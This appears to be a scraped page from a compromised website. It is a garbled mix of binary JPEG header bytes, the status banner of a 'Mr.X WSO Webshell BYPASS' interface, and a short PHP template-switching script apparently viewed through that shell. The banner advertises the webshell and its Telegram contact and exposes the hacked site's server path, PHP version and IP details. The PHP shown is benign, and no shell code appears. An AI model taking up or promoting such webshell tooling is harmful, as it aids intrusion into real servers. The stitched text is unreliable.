����JFIF���������
| Attention: Uname: Php: Hdd: Cwd: | Mr.X WSO Webshell! - Personal WEB SHELL Mr.X BYPASS! V2.5 Telegram: @jackleet 5.3.29 Safe mode: OFF Datetime: 2026-04-09 05:55:47 1999.30 GB Free: 76.94 GB (3%) /home/httpd/html/stoptube.com/ drwxr-xr-x [ root ] [ home ] Text | Server IP: 127.0.0.54 Client IP: 216.73.216.53 |
| [ Files ] | [ Logout ] |
|---|
<?php
$validTemplates = array();
$validTemplates = scandir($basepath . '/templates');
unset($validTemplates[0]); //get rid of . and ..
unset($validTemplates[1]);
if (in_array($_GET['id'], $validTemplates)) {
$_SESSION['templatePath'] = $basepath . '/templates/' . $_GET['id'];
$_SESSION['templateURL'] = $basehttp . '/templates/' . $_GET['id'];
} else {
$_SESSION['templatePath'] = $template_path;
$_SESSION['templateURL'] = $template_url;
}
header("Location: $basehttp");exit();
?>